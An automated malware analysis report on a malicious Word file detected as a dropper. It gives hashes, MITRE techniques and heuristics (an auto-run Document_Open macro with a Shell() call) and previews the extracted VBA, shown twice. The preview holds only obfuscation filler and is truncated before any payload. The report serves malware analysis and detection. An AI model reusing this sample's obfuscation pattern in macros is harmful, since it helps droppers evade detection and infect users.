Office (OLE) malware analysis — malicious · 27d49e0d57bd638d

MALICIOUS

Office (OLE)

181.6 KB Created: 2018-07-20 15:29:00 Authoring application: Microsoft Office Word First seen: 2019-05-16

MD5: 20726d723b0af44bea75b9d9f6d9fdee SHA-1: 15c33f512a5e5a6f9cfffad3b08b629c1b10ff97 SHA-256: 27d49e0d57bd638ddd7e779bd108bc9733d33905de4595fb46e5a3f620bc7708

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The file contains a VBA macro that triggers on document open and utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, commonly used to download and run additional malicious payloads. The ClamAV detection of 'Doc.Dropper.Agent-6618513-0' further supports its role as a dropper.

Heuristics 5

ClamAV: Doc.Dropper.Agent-6618513-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Dropper.Agent-6618513-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42066 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	42066 bytes
SHA-256: `6c53d5612212d2c01374a58be6a7629f0a3da44b9901f8fa52074d10322365c4`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "oCorzdV" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Function uDlRlVhivZIL() On Error Resume Next If zKFjJm >= HOQzu Then qBiKo = 183388958 + 155564576 ElseIf qaRpn < LvwQY Then For bBUCl = 96 To 3879 OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX) Next bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz) End If If bdiwEO >= wjGuoT Then jOmTzT = 183388958 + 155564576 ElseIf onUfmz < pNRfCr Then For frOAR = 96 To 3879 wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU) Next wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH) End If If dllWNG >= TBpdc Then YriaD = 183388958 + 155564576 ElseIf NjjtsF < YwoLFt Then For YhkJH = 96 To 3879 saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC) Next nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz) End If If lMwjN >= JXWlY Then KMVmm = 183388958 + 155564576 ElseIf EXWvzi < MfCEE Then For tCwMcz = 96 To 3879 PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop) Next VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB) End If If Rjjfst >= cnXuZJ Then DPDfZ = 183388958 + 155564576 ElseIf WFztn < PTzUU Then For FYiiw = 96 To 3879 WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw) Next iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj) End If End Function Private Function NKIlIUbQzwV() On Error Resume Next If HsSLR >= Gbimp Then QJSTqd = 183388958 + 155564576 ElseIf VBfGw < zVujS Then For dOFRE = 96 To 3879 iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH) Next zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH) End If If uwvmz >= WlmHf Then lGULbn = 183388958 + 155564576 ElseIf DIjpZ < oWHMfY Then For cOpwDF = 96 To 3879 oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW) Next RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA) End If If iwuAiH >= NiQlma Then tkOTdl = 183388958 + 155564576 ElseIf cEJpQ < swdFpU Then For VHpZD = 96 To 3879 npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT) Next jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY) End If If pCarz >= SUCoai Then dKwvG = 183388958 + 155564576 ElseIf SRLIi < piXBw Then For OqRcMt = 96 To 3879 lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj) Next urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo) End If If mcLcM >= GIMdfX Then JqqpMm = 183388958 + 155564576 ElseIf jVRnr < DkRKj Then For FHUsCz = 96 To 3879 RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf) Next OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL) End If End Function Private Function ZNBZsodYhlDmfZ() On Error Resume Next If wtJqK >= ZjHSpE Then boHjv = 183388958 + 155564576 ElseIf icWOsw < PHFSZb Then For cIvzt = 96 To 3879 Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw) Next nLatZu = hajQu / QjBckT + 1126 ... (truncated)

SHA-256: 6c53d5612212d2c01374a58be6a7629f0a3da44b9901f8fa52074d10322365c4

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "oCorzdV"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Function uDlRlVhivZIL()
On Error Resume Next
   If zKFjJm >= HOQzu Then
      qBiKo = 183388958 + 155564576
      ElseIf qaRpn < LvwQY Then
      For bBUCl = 96 To 3879
         OMPLI = 58118 / kkjzV * jliPYj / SfwqG / (82454 * 81877 * 17115 + ttoQX)
      Next
      bJiSnj = Ubwbc / WslvWQ + 77999 - OYFRnA - (qqKEP * JZkGso / KWuiO / mfHzSz * 67357 * NkZAz)
   End If
   If bdiwEO >= wjGuoT Then
      jOmTzT = 183388958 + 155564576
      ElseIf onUfmz < pNRfCr Then
      For frOAR = 96 To 3879
         wUfWwC = 77076 / hnpOlT * qNQSQJ / WoOmb / (69318 * 8298 * 44074 + SfdjU)
      Next
      wjjJp = acRQY / odziB + 63258 - zqHJbE - (KPWiHm * hPhjG / zwMzV / NPsZj * 58536 * qWRqZH)
   End If
   If dllWNG >= TBpdc Then
      YriaD = 183388958 + 155564576
      ElseIf NjjtsF < YwoLFt Then
      For YhkJH = 96 To 3879
         saMGH = 79623 / JoVGw * LSKtst / jiQiq / (69567 * 68806 * 39350 + qHVTC)
      Next
      nUclCi = jaiMH / pOnsPq + 39374 - KhQXF - (JzOkf * PfqQHq / Jwpvdc / fmCOF * 55302 * kcmMNz)
   End If
   If lMwjN >= JXWlY Then
      KMVmm = 183388958 + 155564576
      ElseIf EXWvzi < MfCEE Then
      For tCwMcz = 96 To 3879
         PiVOfd = 63062 / XXHzZ * sIqqM / dAnGT / (35186 * 83713 * 60398 + OAsop)
      Next
      VBIPWw = pHuEib / uFVPi + 38176 - vPuNl - (QIXPL * lXHibq / vLjLP / PiKJic * 20224 * RZmNB)
   End If
   If Rjjfst >= cnXuZJ Then
      DPDfZ = 183388958 + 155564576
      ElseIf WFztn < PTzUU Then
      For FYiiw = 96 To 3879
         WtZCXl = 68375 / BzOKj * bOaLhq / siWiSC / (41370 * 37542 * 71654 + YTWIjw)
      Next
      iNJkz = Enlmz / zSzFoi + 29436 - XFjOj - (DprMZ * SFdTjH / MRrjPY / nbbNhi * 32343 * zcivBj)
   End If
End Function
Private Function NKIlIUbQzwV()
On Error Resume Next
   If HsSLR >= Gbimp Then
      QJSTqd = 183388958 + 155564576
      ElseIf VBfGw < zVujS Then
      For dOFRE = 96 To 3879
         iwEsr = 61956 / NITQn * pZwSQb / VAUqLu / (23270 * 36919 * 24232 + LsOuH)
      Next
      zcKzwi = dEHrc / iwppSD + 67111 - NhwUoA - (IYZvht * pFcnn / qmDDjZ / RWCwqY * 7752 * vNfKhH)
   End If
   If uwvmz >= WlmHf Then
      lGULbn = 183388958 + 155564576
      ElseIf DIjpZ < oWHMfY Then
      For cOpwDF = 96 To 3879
         oHqbD = 55365 / WNGEX * PSvKI / pJCPY / (13010 * 66959 * 74747 + WQYIW)
      Next
      RvSIm = sRIAIH / cKTfn + 65286 - LlsRU - (pAzwi * BowXdC / YwruO / zSKuD * 72147 * aGIjDA)
   End If
   If iwuAiH >= NiQlma Then
      tkOTdl = 183388958 + 155564576
      ElseIf cEJpQ < swdFpU Then
      For VHpZD = 96 To 3879
         npSan = 33536 / RUuvO * jKFrlL / MqQBK / (92046 * 34910 * 38529 + lvpPT)
      Next
      jKiVXG = YChqLk / PPDNpz + 93010 - QPrzp - (izGwL * ivNPnH / SOUUkh / sWrba * 41534 * HtPiY)
   End If
   If pCarz >= SUCoai Then
      dKwvG = 183388958 + 155564576
      ElseIf SRLIi < piXBw Then
      For OqRcMt = 96 To 3879
         lhFXUD = 2218 / IYwwUX * wBdtv / JRvTE / (4782 * 22220 * 83386 + BwDSVj)
      Next
      urFdh = KaEdOI / PwSzJb + 32256 - EQApA - (XztBB * mHmoS / cHUOao / wjCjF * 18381 * TBpbEo)
   End If
   If mcLcM >= GIMdfX Then
      JqqpMm = 183388958 + 155564576
      ElseIf jVRnr < DkRKj Then
      For FHUsCz = 96 To 3879
         RsYpCZ = 73499 / JLzlsB * oRKXkF / WqBuBS / (84226 * 79259 * 96244 + skUJIf)
      Next
      OFMtY = YrcZS / hfMWj + 43254 - oIXUDU - (MtHhW * mvJfso / YcDZsZ / RIfOkm * 50943 * HqlJZL)
   End If
End Function
Private Function ZNBZsodYhlDmfZ()
On Error Resume Next
   If wtJqK >= ZjHSpE Then
      boHjv = 183388958 + 155564576
      ElseIf icWOsw < PHFSZb Then
      For cIvzt = 96 To 3879
         Jljfah = 44610 / qMrlwr * hciQsW / SaptO / (5511 * 70693 * 36367 + JmzYzw)
      Next
      nLatZu = hajQu / QjBckT + 1126
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.